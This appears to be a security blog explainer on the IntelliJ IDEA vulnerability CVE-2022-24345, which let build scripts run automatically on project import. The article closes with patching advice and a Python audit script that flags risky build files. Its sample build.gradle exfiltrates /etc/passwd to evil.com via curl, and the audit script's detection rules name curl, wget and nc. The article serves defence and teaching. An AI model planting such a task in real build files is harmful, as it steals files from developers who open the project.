JetBrains IntelliJ IDEA is one of the world’s most popular IDEs, used by millions of developers. But in early 2022 a serious vulnerability was reported, tracked as CVE-2022-24345, that could allow attackers to execute code on your computer just by getting you to open a project, without ever asking for your permission.

This article breaks down how the vulnerability worked, why it was dangerous, and shows a code snippet to help you understand the exploit. We’ll also point to references if you want to go deeper.

What Is CVE-2022-24345?

Simply put: if you opened a malicious project in IntelliJ IDEA before version 2021.2.4, code from that project could start running on your computer without any warning.

Reference:
- JetBrains Security Advisory

Here’s how JetBrains explained it:

> “An attacker could prepare a special project containing a malicious Gradle/Maven script, which would be executed as soon as a user opens the project. The code could run before any prompt or permission request is shown.”

You didn’t have to hit “Run”, you didn’t have to build anything, and you didn’t have to accept a prompt.

How Did The Exploit Work?

The core issue was in the way IntelliJ handled _trusted_ projects and project scripts. Before the fix, when you opened a new Gradle or Maven project, the IDE could run the build scripts inside that project automatically, as part of importing it. The IDE did not sufficiently check those scripts or ask for your consent before executing them.

Example: Malicious build.gradle File

An attacker publishes a public repository (maybe as an “example” project or a code snippet for fixing a bug). You clone it and open it in IntelliJ IDEA (version < 2021.2.4).

Here’s what the attacker might put in build.gradle:

// build.gradle
import org.gradle.api.DefaultTask
import org.gradle.api.tasks.TaskAction

task evilTask(type: EvilTask)

class EvilTask extends DefaultTask {
    @TaskAction
    def doStuff() {
        // This code runs immediately!
        "curl -F 'file=@/etc/passwd' http://evil.com/steal".execute()
    }
}

evilTask.doFirst {
    println "Running malicious code!"
}

When the project is opened, the IDE imports the build and evaluates this script automatically, so the code can run and, in this example, send your local files to the attacker’s server.

Protecting Yourself

UPDATE!
First, update to IntelliJ IDEA 2021.2.4 or later. In this and all newer versions, JetBrains fixed the issue by making IntelliJ request explicit trust before running code from new projects.

What Changed?

Now the IDE opens untrusted projects in a “safe mode”. It won’t execute build scripts before you grant permission.

See the full advisory here:
- JetBrains: Critical Vulnerability in IntelliJ-based IDEs

Mitigation: The Secure Way

If for some reason you’re stuck on an old version, disable automatic project import and _never_ open projects from public or unknown sources without inspecting their build scripts first.
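As an added example (not code from JetBrains, and not part of the original article), here is a small Python audit you can run over a freshly cloned checkout before opening it in the IDE. It walks the checkout for Gradle and Maven build files, flags constructs that spawn processes or reach the network during import, and checks whether an IDE version string is at or past the fixed release named above. The file names, the regular-expression rules and the sample build files are assumptions constructed for this example, not an official indicator list; a clean result only means none of these heuristics fired.

```python
"""Pre-open audit for a cloned project's build scripts.

Added example for this article; not code from JetBrains or the original
post. The rule list is a heuristic chosen for this example and a clean
result is not proof of safety: review every hit before opening the project.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List, Tuple

# First IntelliJ IDEA release containing the fix, per the advisory.
FIXED_VERSION = (2021, 2, 4)

# Files a Gradle or Maven import evaluates before you ever press Run.
BUILD_FILES = {"build.gradle", "build.gradle.kts", "settings.gradle",
               "settings.gradle.kts", "pom.xml"}

# Heuristics (constructed for this example): constructs that spawn
# processes or reach the network from inside a build script.
SUSPICIOUS: List[Tuple[str, re.Pattern]] = [
    ("groovy-string-execute", re.compile(r"""["'].*?["']\s*\.execute\(""")),
    ("runtime-exec", re.compile(r"Runtime\.getRuntime\(\)\.exec\(")),
    ("process-builder", re.compile(r"\bProcessBuilder\s*\(")),
    ("gradle-exec-block", re.compile(r"\bexec\s*\{")),
    ("network-tool", re.compile(r"\b(curl|wget|nc|ncat)\b")),
    ("maven-exec-plugin", re.compile(
        r"<artifactId>\s*(exec-maven-plugin|maven-antrun-plugin)\s*</artifactId>")),
]


def version_is_fixed(version: str) -> bool:
    """True if an IDE version string such as '2021.2.3' is 2021.2.4 or later."""
    parts = tuple(int(p) for p in version.split("."))
    parts += (0,) * (3 - len(parts))  # '2021.3' compares as 2021.3.0
    return parts >= FIXED_VERSION


def scan_text(name: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) match in a build file's text."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in SUSPICIOUS:
            if pattern.search(line):
                findings.append({"file": name, "line": lineno,
                                 "rule": rule, "text": line.strip()})
    return findings


def scan_project(root: Path) -> List[Dict[str, object]]:
    """Scan every recognised build file under root, at any depth."""
    findings: List[Dict[str, object]] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.name in BUILD_FILES:
            rel = str(path.relative_to(root))
            findings.extend(scan_text(rel, path.read_text(errors="replace")))
    return findings


# Constructed sample inputs standing in for files in a cloned repository.
SAMPLE_SUSPICIOUS_GRADLE = """\
plugins { id 'java' }

// Top-level statements execute during Gradle's configuration phase,
// i.e. while the IDE is still importing the project.
def probe = "uname -a".execute()
println probe.text

task fetchTools {
    doLast {
        exec { commandLine 'sh', '-c', 'wget -q http://example.invalid/tools.tgz' }
    }
}
"""

SAMPLE_CLEAN_GRADLE = """\
plugins { id 'java' }
repositories { mavenCentral() }
dependencies {
    implementation 'org.apache.commons:commons-lang3:3.12.0'
}
"""

SAMPLE_POM = """\
<project>
  <build><plugins><plugin>
    <groupId>org.codehaus.mojo</groupId>
    <artifactId>exec-maven-plugin</artifactId>
  </plugin></plugins></build>
</project>
"""

if __name__ == "__main__":
    # Usage: python audit_build_scripts.py /path/to/cloned/project
    if len(sys.argv) > 1:
        hits = scan_project(Path(sys.argv[1]))
    else:
        hits = (scan_text("build.gradle", SAMPLE_SUSPICIOUS_GRADLE)
                + scan_text("pom.xml", SAMPLE_POM))
    for hit in hits:
        print(f"{hit['file']}:{hit['line']} [{hit['rule']}] {hit['text']}")
    print("review before opening" if hits else "no heuristic hits")
```

Run it with the path of the checkout as the only argument; with no argument it scans the constructed samples. Hits on exec-maven-plugin or an `exec {}` block are not malicious by themselves, which is why the script reports for review rather than blocking: the point is to read the build script yourself before the IDE does it for you.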

- CVE Details: CVE-2022-24345
- JetBrains Security Blog
- NVD NIST

Final Thoughts

CVE-2022-24345 is a wake-up call for everyone using tools like IntelliJ IDEA. Even a code editor can have dangerous bugs. Always update your development tools, double-check before opening projects from the web, and read what’s inside build scripts before letting anything run locally.

If you want a safe dev experience: stay up to date, stay vigilant, stay secure.

Timeline

Published on: 02/25/2022 15:15:00 UTC
Last modified on: 03/04/2022 20:45:00 UTC